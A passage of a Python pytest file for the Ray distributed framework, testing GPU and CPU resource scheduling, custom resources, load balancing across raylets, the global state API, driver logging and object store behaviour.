assert set_of_ids == {(i, ) for i in range(10)}
list_of_ids = ray.get([f2.remote(), f4.remote(), f4.remote()])
all_ids = [gpu_id for gpu_ids in list_of_ids for gpu_id in gpu_ids]
assert set(all_ids) == set(range(10))
# There are only 10 GPUs, and each task uses 5 GPUs, so there should only
# be 2 tasks scheduled at a given time.
t1 = time.time()
ray.get([f5.remote() for _ in range(20)])
assert time.time() - t1 >= 10 * 0.1
# Test that actors have CUDA_VISIBLE_DEVICES set properly.
@ray.remote
class Actor0(object):
def __init__(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 0
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
# Set self.x to make sure that we got here.
self.x = 1
def test(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 0
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
return self.x
@ray.remote(num_gpus=1)
class Actor1(object):
def __init__(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
# Set self.x to make sure that we got here.
self.x = 1
def test(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
return self.x
a0 = Actor0.remote()
ray.get(a0.test.remote())
a1 = Actor1.remote()
ray.get(a1.test.remote())
def test_zero_cpus(shutdown_only):
ray.init(num_cpus=0)
# We should be able to execute a task that requires 0 CPU resources.
@ray.remote(num_cpus=0)
def f():
return 1
ray.get(f.remote())
# We should be able to create an actor that requires 0 CPU resources.
@ray.remote(num_cpus=0)
class Actor(object):
def method(self):
pass
a = Actor.remote()
x = a.method.remote()
ray.get(x)
def test_zero_cpus_actor(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=0)
cluster.add_node(num_cpus=2)
ray.init(address=cluster.address)
node_id = ray.worker.global_worker.node.unique_id
@ray.remote
class Foo(object):
def method(self):
return ray.worker.global_worker.node.unique_id
# Make sure tasks and actors run on the remote raylet.
a = Foo.remote()
assert ray.get(a.method.remote()) != node_id
def test_fractional_resources(shutdown_only):
ray.init(num_cpus=6, num_gpus=3, resources={"Custom": 1})
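    # With three GPUs and six actors each requesting half a GPU, every GPU
    # should end up shared by exactly two actors.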
@ray.remote(num_gpus=0.5)
class Foo1(object):
def method(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
return gpu_ids[0]
foos = [Foo1.remote() for _ in range(6)]
gpu_ids = ray.get([f.method.remote() for f in foos])
for i in range(3):
assert gpu_ids.count(i) == 2
del foos
@ray.remote
class Foo2(object):
def method(self):
pass
# Create an actor that requires 0.7 of the custom resource.
f1 = Foo2._remote([], {}, resources={"Custom": 0.7})
ray.get(f1.method.remote())
# Make sure that we cannot create an actor that requires 0.7 of the
# custom resource. TODO(rkn): Re-enable this once ray.wait is
# implemented.
f2 = Foo2._remote([], {}, resources={"Custom": 0.7})
ready, _ = ray.wait([f2.method.remote()], timeout=0.5)
assert len(ready) == 0
    # Make sure we can start an actor that requires only 0.3 of the custom
# resource.
f3 = Foo2._remote([], {}, resources={"Custom": 0.3})
ray.get(f3.method.remote())
del f1, f3
# Make sure that we get exceptions if we submit tasks that require a
# fractional number of resources greater than 1.
@ray.remote(num_cpus=1.5)
def test():
pass
with pytest.raises(ValueError):
test.remote()
with pytest.raises(ValueError):
Foo2._remote([], {}, resources={"Custom": 1.5})
def test_multiple_raylets(ray_start_cluster):
# This test will define a bunch of tasks that can only be assigned to
# specific raylets, and we will check that they are assigned
# to the correct raylets.
cluster = ray_start_cluster
cluster.add_node(num_cpus=11, num_gpus=0)
cluster.add_node(num_cpus=5, num_gpus=5)
cluster.add_node(num_cpus=10, num_gpus=1)
ray.init(address=cluster.address)
cluster.wait_for_nodes()
# Define a bunch of remote functions that all return the socket name of
# the plasma store. Since there is a one-to-one correspondence between
# plasma stores and raylets (at least right now), this can be
# used to identify which raylet the task was assigned to.
# This must be run on the zeroth raylet.
@ray.remote(num_cpus=11)
def run_on_0():
return ray.worker.global_worker.node.plasma_store_socket_name
# This must be run on the first raylet.
@ray.remote(num_gpus=2)
def run_on_1():
return ray.worker.global_worker.node.plasma_store_socket_name
# This must be run on the second raylet.
@ray.remote(num_cpus=6, num_gpus=1)
def run_on_2():
return ray.worker.global_worker.node.plasma_store_socket_name
# This can be run anywhere.
@ray.remote(num_cpus=0, num_gpus=0)
def run_on_0_1_2():
return ray.worker.global_worker.node.plasma_store_socket_name
# This must be run on the first or second raylet.
@ray.remote(num_gpus=1)
def run_on_1_2():
return ray.worker.global_worker.node.plasma_store_socket_name
# This must be run on the zeroth or second raylet.
@ray.remote(num_cpus=8)
def run_on_0_2():
return ray.worker.global_worker.node.plasma_store_socket_name
def run_lots_of_tasks():
names = []
results = []
for i in range(100):
index = np.random.randint(6)
if index == 0:
names.append("run_on_0")
results.append(run_on_0.remote())
elif index == 1:
names.append("run_on_1")
results.append(run_on_1.remote())
elif index == 2:
names.append("run_on_2")
results.append(run_on_2.remote())
elif index == 3:
names.append("run_on_0_1_2")
results.append(run_on_0_1_2.remote())
elif index == 4:
names.append("run_on_1_2")
results.append(run_on_1_2.remote())
elif index == 5:
names.append("run_on_0_2")
results.append(run_on_0_2.remote())
return names, results
client_table = ray.nodes()
store_names = []
store_names += [
client["ObjectStoreSocketName"] for client in client_table
if client["Resources"].get("GPU", 0) == 0
]
store_names += [
client["ObjectStoreSocketName"] for client in client_table
if client["Resources"].get("GPU", 0) == 5
]
store_names += [
client["ObjectStoreSocketName"] for client in client_table
if client["Resources"].get("GPU", 0) == 1
]
assert len(store_names) == 3
def validate_names_and_results(names, results):
for name, result in zip(names, ray.get(results)):
if name == "run_on_0":
assert result in [store_names[0]]
elif name == "run_on_1":
assert result in [store_names[1]]
elif name == "run_on_2":
assert result in [store_names[2]]
elif name == "run_on_0_1_2":
assert (result in [
store_names[0], store_names[1], store_names[2]
])
elif name == "run_on_1_2":
assert result in [store_names[1], store_names[2]]
elif name == "run_on_0_2":
assert result in [store_names[0], store_names[2]]
else:
raise Exception("This should be unreachable.")
assert set(ray.get(results)) == set(store_names)
names, results = run_lots_of_tasks()
validate_names_and_results(names, results)
# Make sure the same thing works when this is nested inside of a task.
@ray.remote
def run_nested1():
names, results = run_lots_of_tasks()
return names, results
@ray.remote
def run_nested2():
names, results = ray.get(run_nested1.remote())
return names, results
names, results = ray.get(run_nested2.remote())
validate_names_and_results(names, results)
def test_custom_resources(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=3, resources={"CustomResource": 0})
cluster.add_node(num_cpus=3, resources={"CustomResource": 1})
ray.init(address=cluster.address)
@ray.remote
def f():
time.sleep(0.001)
return ray.worker.global_worker.node.unique_id
@ray.remote(resources={"CustomResource": 1})
def g():
time.sleep(0.001)
return ray.worker.global_worker.node.unique_id
@ray.remote(resources={"CustomResource": 1})
def h():
ray.get([f.remote() for _ in range(5)])
return ray.worker.global_worker.node.unique_id
# The f tasks should be scheduled on both raylets.
assert len(set(ray.get([f.remote() for _ in range(50)]))) == 2
node_id = ray.worker.global_worker.node.unique_id
# The g tasks should be scheduled only on the second raylet.
raylet_ids = set(ray.get([g.remote() for _ in range(50)]))
assert len(raylet_ids) == 1
assert list(raylet_ids)[0] != node_id
    # Make sure that resource bookkeeping works when a task that uses a
    # custom resource gets blocked.
ray.get([h.remote() for _ in range(5)])
def test_two_custom_resources(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(
num_cpus=3, resources={
"CustomResource1": 1,
"CustomResource2": 2
})
cluster.add_node(
num_cpus=3, resources={
"CustomResource1": 3,
"CustomResource2": 4
})
ray.init(address=cluster.address)
@ray.remote(resources={"CustomResource1": 1})
def f():
time.sleep(0.001)
return ray.worker.global_worker.node.unique_id
@ray.remote(resources={"CustomResource2": 1})
def g():
time.sleep(0.001)
return ray.worker.global_worker.node.unique_id
@ray.remote(resources={"CustomResource1": 1, "CustomResource2": 3})
def h():
time.sleep(0.001)
return ray.worker.global_worker.node.unique_id
@ray.remote(resources={"CustomResource1": 4})
def j():
time.sleep(0.001)
return ray.worker.global_worker.node.unique_id
@ray.remote(resources={"CustomResource3": 1})
def k():
time.sleep(0.001)
return ray.worker.global_worker.node.unique_id
# The f and g tasks should be scheduled on both raylets.
assert len(set(ray.get([f.remote() for _ in range(50)]))) == 2
assert len(set(ray.get([g.remote() for _ in range(50)]))) == 2
node_id = ray.worker.global_worker.node.unique_id
# The h tasks should be scheduled only on the second raylet.
raylet_ids = set(ray.get([h.remote() for _ in range(50)]))
assert len(raylet_ids) == 1
assert list(raylet_ids)[0] != node_id
# Make sure that tasks with unsatisfied custom resource requirements do
# not get scheduled.
ready_ids, remaining_ids = ray.wait([j.remote(), k.remote()], timeout=0.5)
assert ready_ids == []
def test_many_custom_resources(shutdown_only):
num_custom_resources = 10000
total_resources = {
str(i): np.random.randint(1, 7)
for i in range(num_custom_resources)
}
ray.init(num_cpus=5, resources=total_resources)
def f():
return 1
remote_functions = []
for _ in range(20):
num_resources = np.random.randint(0, num_custom_resources + 1)
permuted_resources = np.random.permutation(
num_custom_resources)[:num_resources]
random_resources = {
str(i): total_resources[str(i)]
for i in permuted_resources
}
remote_function = ray.remote(resources=random_resources)(f)
remote_functions.append(remote_function)
remote_functions.append(ray.remote(f))
remote_functions.append(ray.remote(resources=total_resources)(f))
results = []
for remote_function in remote_functions:
results.append(remote_function.remote())
results.append(remote_function.remote())
results.append(remote_function.remote())
ray.get(results)
# TODO: 5 retry attempts may be too few for Travis, and we may need to
# increase this if the test starts being flaky on Travis.
def test_zero_capacity_deletion_semantics(shutdown_only):
ray.init(num_cpus=2, num_gpus=1, resources={"test_resource": 1})
def test():
resources = ray.available_resources()
MAX_RETRY_ATTEMPTS = 5
retry_count = 0
del resources["memory"]
del resources["object_store_memory"]
while resources and retry_count < MAX_RETRY_ATTEMPTS:
time.sleep(0.1)
resources = ray.available_resources()
retry_count += 1
if retry_count >= MAX_RETRY_ATTEMPTS:
raise RuntimeError(
"Resources were available even after five retries.")
return resources
function = ray.remote(
num_cpus=2, num_gpus=1, resources={"test_resource": 1})(test)
cluster_resources = ray.get(function.remote())
    # All cluster resources should be utilized, so cluster_resources
    # must be empty.
assert cluster_resources == {}
@pytest.fixture
def save_gpu_ids_shutdown_only():
    # Record the current value of this environment variable so that we can
    # reset it after the test.
original_gpu_ids = os.environ.get("CUDA_VISIBLE_DEVICES", None)
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
# Reset the environment variable.
if original_gpu_ids is not None:
os.environ["CUDA_VISIBLE_DEVICES"] = original_gpu_ids
else:
del os.environ["CUDA_VISIBLE_DEVICES"]
def test_specific_gpus(save_gpu_ids_shutdown_only):
allowed_gpu_ids = [4, 5, 6]
os.environ["CUDA_VISIBLE_DEVICES"] = ",".join(
[str(i) for i in allowed_gpu_ids])
ray.init(num_gpus=3)
@ray.remote(num_gpus=1)
def f():
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert gpu_ids[0] in allowed_gpu_ids
@ray.remote(num_gpus=2)
def g():
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 2
assert gpu_ids[0] in allowed_gpu_ids
assert gpu_ids[1] in allowed_gpu_ids
ray.get([f.remote() for _ in range(100)])
ray.get([g.remote() for _ in range(100)])
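# For illustration (not part of the original test file): with
# CUDA_VISIBLE_DEVICES restricted as above, the IDs returned by
# ray.get_gpu_ids() inside a task are drawn from that allowed list, e.g. a
# single-GPU task might observe something like:
#
#     ray.get_gpu_ids()   # e.g. [5], always one of the allowed IDs 4, 5, 6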
def test_blocking_tasks(ray_start_regular):
@ray.remote
def f(i, j):
return (i, j)
@ray.remote
def g(i):
# Each instance of g submits and blocks on the result of another
# remote task.
object_ids = [f.remote(i, j) for j in range(2)]
return ray.get(object_ids)
@ray.remote
def h(i):
        # Each instance of h submits and blocks on the result of another
        # remote task using ray.wait.
object_ids = [f.remote(i, j) for j in range(2)]
return ray.wait(object_ids, num_returns=len(object_ids))
ray.get([h.remote(i) for i in range(4)])
@ray.remote
def _sleep(i):
time.sleep(0.01)
return (i)
@ray.remote
def sleep():
# Each instance of sleep submits and blocks on the result of
# another remote task, which takes some time to execute.
ray.get([_sleep.remote(i) for i in range(10)])
ray.get(sleep.remote())
def test_max_call_tasks(ray_start_regular):
@ray.remote(max_calls=1)
def f():
return os.getpid()
pid = ray.get(f.remote())
ray.tests.utils.wait_for_pid_to_exit(pid)
@ray.remote(max_calls=2)
def f():
return os.getpid()
pid1 = ray.get(f.remote())
pid2 = ray.get(f.remote())
assert pid1 == pid2
ray.tests.utils.wait_for_pid_to_exit(pid1)
def attempt_to_load_balance(remote_function,
args,
total_tasks,
num_nodes,
minimum_count,
num_attempts=100):
attempts = 0
while attempts < num_attempts:
locations = ray.get(
[remote_function.remote(*args) for _ in range(total_tasks)])
names = set(locations)
counts = [locations.count(name) for name in names]
logger.info("Counts are {}.".format(counts))
if (len(names) == num_nodes
and all(count >= minimum_count for count in counts)):
break
attempts += 1
assert attempts < num_attempts
def test_load_balancing(ray_start_cluster):
# This test ensures that tasks are being assigned to all raylets
# in a roughly equal manner.
cluster = ray_start_cluster
num_nodes = 3
num_cpus = 7
for _ in range(num_nodes):
cluster.add_node(num_cpus=num_cpus)
ray.init(address=cluster.address)
@ray.remote
def f():
time.sleep(0.01)
return ray.worker.global_worker.node.unique_id
attempt_to_load_balance(f, [], 100, num_nodes, 10)
attempt_to_load_balance(f, [], 1000, num_nodes, 100)
def test_load_balancing_with_dependencies(ray_start_cluster):
# This test ensures that tasks are being assigned to all raylets in a
# roughly equal manner even when the tasks have dependencies.
cluster = ray_start_cluster
num_nodes = 3
for _ in range(num_nodes):
cluster.add_node(num_cpus=1)
ray.init(address=cluster.address)
@ray.remote
def f(x):
time.sleep(0.010)
return ray.worker.global_worker.node.unique_id
# This object will be local to one of the raylets. Make sure
# this doesn't prevent tasks from being scheduled on other raylets.
x = ray.put(np.zeros(1000000))
attempt_to_load_balance(f, [x], 100, num_nodes, 25)
def wait_for_num_tasks(num_tasks, timeout=10):
start_time = time.time()
while time.time() - start_time < timeout:
if len(ray.tasks()) >= num_tasks:
return
time.sleep(0.1)
raise RayTestTimeoutException("Timed out while waiting for global state.")
def wait_for_num_objects(num_objects, timeout=10):
start_time = time.time()
while time.time() - start_time < timeout:
if len(ray.objects()) >= num_objects:
return
time.sleep(0.1)
raise RayTestTimeoutException("Timed out while waiting for global state.")
@pytest.mark.skipif(
os.environ.get("RAY_USE_NEW_GCS") == "on",
reason="New GCS API doesn't have a Python API yet.")
def test_global_state_api(shutdown_only):
error_message = ("The ray global state API cannot be used "
"before ray.init has been called.")
with pytest.raises(Exception, match=error_message):
ray.objects()
with pytest.raises(Exception, match=error_message):
ray.tasks()
with pytest.raises(Exception, match=error_message):
ray.nodes()
with pytest.raises(Exception, match=error_message):
ray.jobs()
ray.init(num_cpus=5, num_gpus=3, resources={"CustomResource": 1})
assert ray.cluster_resources()["CPU"] == 5
assert ray.cluster_resources()["GPU"] == 3
assert ray.cluster_resources()["CustomResource"] == 1
assert ray.objects() == {}
job_id = ray.utils.compute_job_id_from_driver(
ray.WorkerID(ray.worker.global_worker.worker_id))
driver_task_id = ray.worker.global_worker.current_task_id.hex()
# One task is put in the task table which corresponds to this driver.
wait_for_num_tasks(1)
task_table = ray.tasks()
assert len(task_table) == 1
assert driver_task_id == list(task_table.keys())[0]
task_spec = task_table[driver_task_id]["TaskSpec"]
nil_unique_id_hex = ray.UniqueID.nil().hex()
nil_actor_id_hex = ray.ActorID.nil().hex()
assert task_spec["TaskID"] == driver_task_id
assert task_spec["ActorID"] == nil_actor_id_hex
assert task_spec["Args"] == []
assert task_spec["JobID"] == job_id.hex()
assert task_spec["FunctionID"] == nil_unique_id_hex
assert task_spec["ReturnObjectIDs"] == []
client_table = ray.nodes()
node_ip_address = ray.worker.global_worker.node_ip_address
assert len(client_table) == 1
assert client_table[0]["NodeManagerAddress"] == node_ip_address
@ray.remote
def f(*xs):
return 1
x_id = ray.put(1)
result_id = f.remote(1, "hi", x_id)
# Wait for one additional task to complete.
wait_for_num_tasks(1 + 1)
task_table = ray.tasks()
assert len(task_table) == 1 + 1
task_id_set = set(task_table.keys())
task_id_set.remove(driver_task_id)
task_id = list(task_id_set)[0]
task_spec = task_table[task_id]["TaskSpec"]
assert task_spec["ActorID"] == nil_actor_id_hex
assert task_spec["Args"] == [1, "hi", x_id]
assert task_spec["JobID"] == job_id.hex()
assert task_spec["ReturnObjectIDs"] == [result_id]
assert task_table[task_id] == ray.tasks(task_id)
# Wait for two objects, one for the x_id and one for result_id.
wait_for_num_objects(2)
def wait_for_object_table():
timeout = 10
start_time = time.time()
while time.time() - start_time < timeout:
object_table = ray.objects()
tables_ready = (object_table[x_id]["ManagerIDs"] is not None and
object_table[result_id]["ManagerIDs"] is not None)
if tables_ready:
return
time.sleep(0.1)
raise RayTestTimeoutException(
"Timed out while waiting for object table to "
"update.")
object_table = ray.objects()
assert len(object_table) == 2
assert object_table[x_id] == ray.objects(x_id)
object_table_entry = ray.objects(result_id)
assert object_table[result_id] == object_table_entry
job_table = ray.jobs()
assert len(job_table) == 1
assert job_table[0]["JobID"] == job_id.hex()
assert job_table[0]["NodeManagerAddress"] == node_ip_address
# TODO(rkn): Pytest actually has tools for capturing stdout and stderr, so we
# should use those, but they seem to conflict with Ray's use of faulthandler.
class CaptureOutputAndError(object):
"""Capture stdout and stderr of some span.
This can be used as follows.
captured = {}
with CaptureOutputAndError(captured):
# Do stuff.
# Access captured["out"] and captured["err"].
"""
def __init__(self, captured_output_and_error):
if sys.version_info >= (3, 0):
import io
self.output_buffer = io.StringIO()
self.error_buffer = io.StringIO()
else:
import cStringIO
self.output_buffer = cStringIO.StringIO()
self.error_buffer = cStringIO.StringIO()
self.captured_output_and_error = captured_output_and_error
def __enter__(self):
sys.stdout.flush()
sys.stderr.flush()
self.old_stdout = sys.stdout
self.old_stderr = sys.stderr
sys.stdout = self.output_buffer
sys.stderr = self.error_buffer
def __exit__(self, exc_type, exc_value, traceback):
sys.stdout.flush()
sys.stderr.flush()
sys.stdout = self.old_stdout
sys.stderr = self.old_stderr
self.captured_output_and_error["out"] = self.output_buffer.getvalue()
self.captured_output_and_error["err"] = self.error_buffer.getvalue()
def test_logging_to_driver(shutdown_only):
ray.init(num_cpus=1, log_to_driver=True)
@ray.remote
def f():
# It's important to make sure that these print statements occur even
# without calling sys.stdout.flush() and sys.stderr.flush().
for i in range(100):
print(i)
print(100 + i, file=sys.stderr)
captured = {}
with CaptureOutputAndError(captured):
ray.get(f.remote())
time.sleep(1)
output_lines = captured["out"]
for i in range(200):
assert str(i) in output_lines
# TODO(rkn): Check that no additional logs appear beyond what we expect
# and that there are no duplicate logs. Once we address the issue
# described in https://github.com/ray-project/ray/pull/5462, we should
# also check that nothing is logged to stderr.
def test_not_logging_to_driver(shutdown_only):
ray.init(num_cpus=1, log_to_driver=False)
@ray.remote
def f():
for i in range(100):
print(i)
print(100 + i, file=sys.stderr)
sys.stdout.flush()
sys.stderr.flush()
captured = {}
with CaptureOutputAndError(captured):
ray.get(f.remote())
time.sleep(1)
output_lines = captured["out"]
assert len(output_lines) == 0
# TODO(rkn): Check that no additional logs appear beyond what we expect
# and that there are no duplicate logs. Once we address the issue
# described in https://github.com/ray-project/ray/pull/5462, we should
# also check that nothing is logged to stderr.
@pytest.mark.skipif(
os.environ.get("RAY_USE_NEW_GCS") == "on",
reason="New GCS API doesn't have a Python API yet.")
def test_workers(shutdown_only):
num_workers = 3
ray.init(num_cpus=num_workers)
@ray.remote
def f():
return id(ray.worker.global_worker), os.getpid()
# Wait until all of the workers have started.
worker_ids = set()
while len(worker_ids) != num_workers:
worker_ids = set(ray.get([f.remote() for _ in range(10)]))
def test_specific_job_id():
dummy_driver_id = ray.JobID.from_int(1)
ray.init(num_cpus=1, job_id=dummy_driver_id)
# in driver
assert dummy_driver_id == ray._get_runtime_context().current_driver_id
# in worker
@ray.remote
def f():
return ray._get_runtime_context().current_driver_id
assert dummy_driver_id == ray.get(f.remote())
ray.shutdown()
def test_object_id_properties():
id_bytes = b"00112233445566778899"
object_id = ray.ObjectID(id_bytes)
assert object_id.binary() == id_bytes
object_id = ray.ObjectID.nil()
assert object_id.is_nil()
with pytest.raises(ValueError, match=r".*needs to have length 20.*"):
ray.ObjectID(id_bytes + b"1234")
with pytest.raises(ValueError, match=r".*needs to have length 20.*"):
ray.ObjectID(b"0123456789")
object_id = ray.ObjectID.from_random()
assert not object_id.is_nil()
assert object_id.binary() != id_bytes
id_dumps = pickle.dumps(object_id)
id_from_dumps = pickle.loads(id_dumps)
assert id_from_dumps == object_id
file_prefix = "test_object_id_properties"
# Make sure the ids are fork safe.
def write(index):
        hex_id = ray.ObjectID.from_random().hex()
        with open("{}{}".format(file_prefix, index), "w") as fo:
            fo.write(hex_id)
def read(index):
with open("{}{}".format(file_prefix, index), "r") as fi:
for line in fi:
return line
processes = [Process(target=write, args=(_, )) for _ in range(4)]
for process in processes:
process.start()
for process in processes:
process.join()
hexes = {read(i) for i in range(4)}
[os.remove("{}{}".format(file_prefix, i)) for i in range(4)]
assert len(hexes) == 4
@pytest.fixture
def shutdown_only_with_initialization_check():
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
assert not ray.is_initialized()
def test_initialized(shutdown_only_with_initialization_check):
assert not ray.is_initialized()
ray.init(num_cpus=0)
assert ray.is_initialized()
def test_initialized_local_mode(shutdown_only_with_initialization_check):
assert not ray.is_initialized()
ray.init(num_cpus=0, local_mode=True)
assert ray.is_initialized()
def test_wait_reconstruction(shutdown_only):
ray.init(num_cpus=1, object_store_memory=int(10**8))
@ray.remote
def f():
return np.zeros(6 * 10**7, dtype=np.uint8)
x_id = f.remote()
ray.wait([x_id])
ray.wait([f.remote()])
assert not ray.worker.global_worker.core_worker.object_exists(x_id)
ready_ids, _ = ray.wait([x_id])
assert len(ready_ids) == 1
def test_ray_setproctitle(ray_start_2_cpus):
@ray.remote
class UniqueName(object):
def __init__(self):
assert setproctitle.getproctitle() == "ray_UniqueName:__init__()"
def f(self):
assert setproctitle.getproctitle() == "ray_UniqueName:f()"
@ray.remote
def unique_1():
assert setproctitle.getproctitle(
) == "ray_worker:ray.tests.test_basic.unique_1()"
actor = UniqueName.remote()
ray.get(actor.f.remote())
ray.get(unique_1.remote())
def test_duplicate_error_messages(shutdown_only):
ray.init(num_cpus=0)
driver_id = ray.WorkerID.nil()
error_data = ray.gcs_utils.construct_error_message(driver_id, "test",
"message", 0)
# Push the same message to the GCS twice (they are the same because we
# do not include a timestamp).
r = ray.worker.global_worker.redis_client
r.execute_command("RAY.TABLE_APPEND",
ray.gcs_utils.TablePrefix.Value("ERROR_INFO"),
ray.gcs_utils.TablePubsub.Value("ERROR_INFO_PUBSUB"),
driver_id.binary(), error_data)
# Before https://github.com/ray-project/ray/pull/3316 this would
# give an error
r.execute_command("RAY.TABLE_APPEND",
ray.gcs_utils.TablePrefix.Value("ERROR_INFO"),
ray.gcs_utils.TablePubsub.Value("ERROR_INFO_PUBSUB"),
driver_id.binary(), error_data)
@pytest.mark.skipif(
os.getenv("TRAVIS") is None,
reason="This test should only be run on Travis.")
def test_ray_stack(ray_start_2_cpus):
def unique_name_1():
time.sleep(1000)
@ray.remote
def unique_name_2():
time.sleep(1000)
@ray.remote
def unique_name_3():
unique_name_1()
unique_name_2.remote()
unique_name_3.remote()
success = False
start_time = time.time()
while time.time() - start_time < 30:
# Attempt to parse the "ray stack" call.
output = ray.utils.decode(subprocess.check_output(["ray", "stack"]))
if ("unique_name_1" in output and "unique_name_2" in output
and "unique_name_3" in output):
success = True
break
if not success:
raise Exception("Failed to find necessary information with "
"'ray stack'")
def test_pandas_parquet_serialization():
# Only test this if pandas is installed
pytest.importorskip("pandas")
import pandas as pd
import pyarrow as pa
import pyarrow.parquet as pq
tempdir = tempfile.mkdtemp()
filename = os.path.join(tempdir, "parquet-test")
pd.DataFrame({"col1": [0, 1], "col2": [0, 1]}).to_parquet(filename)
with open(os.path.join(tempdir, "parquet-compression"), "wb") as f:
table = pa.Table.from_arrays([pa.array([1, 2, 3])], ["hello"])
pq.write_table(table, f, compression="lz4")
# Clean up
shutil.rmtree(tempdir)
def test_socket_dir_not_existing(shutdown_only):
random_name = ray.ObjectID.from_random().hex()
temp_raylet_socket_dir = "/tmp/ray/tests/{}".format(random_name)
temp_raylet_socket_name = os.path.join(temp_raylet_socket_dir,
"raylet_socket")
ray.init(num_cpus=1, raylet_socket_name=temp_raylet_socket_name)
def test_raylet_is_robust_to_random_messages(ray_start_regular):
node_manager_address = None
node_manager_port = None
for client in ray.nodes():
if "NodeManagerAddress" in client:
node_manager_address = client["NodeManagerAddress"]
node_manager_port = client["NodeManagerPort"]
assert node_manager_address
assert node_manager_port
# Try to bring down the node manager:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((node_manager_address, node_manager_port))
s.send(1000 * b"asdf")
@ray.remote
def f():
return 1
assert ray.get(f.remote()) == 1
def test_non_ascii_comment(ray_start_regular):
@ray.remote
def f():
# 日本語 Japanese comment
return 1
assert ray.get(f.remote()) == 1
@ray.remote
def echo(x):
return x
@ray.remote
class WithConstructor(object):
def __init__(self, data):
self.data = data
def get_data(self):
return self.data
@ray.remote
class WithoutConstructor(object):
def set_data(self, data):
self.data = data
def get_data(self):
return self.data
class BaseClass(object):
def __init__(self, data):
self.data = data
def get_data(self):
return self.data
@ray.remote
class DerivedClass(BaseClass):
def __init__(self, data):
# Due to different behaviors of super in Python 2 and Python 3,
# we use BaseClass directly here.
BaseClass.__init__(self, data)
def test_load_code_from_local(shutdown_only):
ray.init(load_code_from_local=True, num_cpus=4)
message = "foo"
# Test normal function.
assert ray.get(echo.remote(message)) == message
# Test actor class with constructor.
actor = WithConstructor.remote(1)
assert ray.get(actor.get_data.remote()) == 1
# Test actor class without constructor.
actor = WithoutConstructor.remote()
actor.set_data.remote(1)
assert ray.get(actor.get_data.remote()) == 1
# Test derived actor class.
actor = DerivedClass.remote(1)
assert ray.get(actor.get_data.remote()) == 1
# Test using ray.remote decorator on raw classes.
base_actor_class = ray.remote(num_cpus=1)(BaseClass)
base_actor = base_actor_class.remote(message)
assert ray.get(base_actor.get_data.remote()) == message
def test_shutdown_disconnect_global_state():
ray.init(num_cpus=0)
ray.shutdown()
with pytest.raises(Exception) as e:
ray.objects()
assert str(e.value).endswith("ray.init has been called.")
@pytest.mark.parametrize(
"ray_start_object_store_memory", [150 * 1024 * 1024], indirect=True)
def test_put_pins_object(ray_start_object_store_memory):
x_id = ray.put("HI")
x_copy = ray.ObjectID(x_id.binary())
assert ray.get(x_copy) == "HI"
# x cannot be evicted since x_id pins it
for _ in range(10):
ray.put(np.zeros(10 * 1024 * 1024))
assert ray.get(x_id) == "HI"
assert ray.get(x_copy) == "HI"
    # Now the object can be evicted: x_id pinned it, but x_copy does not,
    # so deleting x_id below removes the only pin.
del x_id
for _ in range(10):
ray.put(np.zeros(10 * 1024 * 1024))
with pytest.raises(ray.exceptions.UnreconstructableError):
ray.get(x_copy)
# weakref put
y_id = ray.put("HI", weakref=True)
for _ in range(10):
ray.put(np.zeros(10 * 1024 * 1024))
with pytest.raises(ray.exceptions.UnreconstructableError):
ray.get(y_id)
@ray.remote
def check_no_buffer_ref(x):
assert x[0].get_buffer_ref() is None
z_id = ray.put("HI")
assert z_id.get_buffer_ref() is not None
ray.get(check_no_buffer_ref.remote([z_id]))
@pytest.mark.parametrize(
"ray_start_object_store_memory", [150 * 1024 * 1024], indirect=True)
def test_redis_lru_with_set(ray_start_object_store_memory):
x = np.zeros(8 * 10**7, dtype=np.uint8)
x_id = ray.put(x, weakref=True)
# Remove the object from the object table to simulate Redis LRU eviction.
removed = False
start_time = time.time()
while time.time() < start_time + 10:
if ray.state.state.redis_clients[0].delete(b"OBJECT" +
x_id.binary()) == 1:
removed = True
break
assert removed
# Now evict the object from the object store.
ray.put(x) # This should not crash.
def test_decorated_function(ray_start_regular):
def function_invocation_decorator(f):
def new_f(args, kwargs):
# Reverse the arguments.
return f(args[::-1], {"d": 5}), kwargs
return new_f
def f(a, b, c, d=None):
return a, b, c, d
f.__ray_invocation_decorator__ = function_invocation_decorator
f = ray.remote(f)
result_id, kwargs = f.remote(1, 2, 3, d=4)
assert kwargs == {"d": 4}
assert ray.get(result_id) == (3, 2, 1, 5)
def test_get_postprocess(ray_start_regular):
def get_postprocessor(object_ids, values):
return [value for value in values if value > 0]
ray.worker.global_worker._post_get_hooks.append(get_postprocessor)
assert ray.get(
[ray.put(i) for i in [0, 1, 3, 5, -1, -3, 4]]) == [1, 3, 5, 4]
def test_export_after_shutdown(ray_start_regular):
# This test checks that we can use actor and remote function definitions
# across multiple Ray sessions.
@ray.remote
def f():
pass
@ray.remote
class Actor(object):
def method(self):
pass
ray.get(f.remote())
a = Actor.remote()
ray.get(a.method.remote())
ray.shutdown()
# Start Ray and use the remote function and actor again.
ray.init(num_cpus=1)
ray.get(f.remote())
a = Actor.remote()
ray.get(a.method.remote())
ray.shutdown()
# Start Ray again and make sure that these definitions can be exported from
# workers.
ray.init(num_cpus=2)
@ray.remote
def export_definitions_from_worker(remote_function, actor_class):
ray.get(remote_function.remote())
actor_handle = actor_class.remote()
ray.get(actor_handle.method.remote())
ray.get(export_definitions_from_worker.remote(f, Actor))
def test_invalid_unicode_in_worker_log(shutdown_only):
info = ray.init(num_cpus=1)
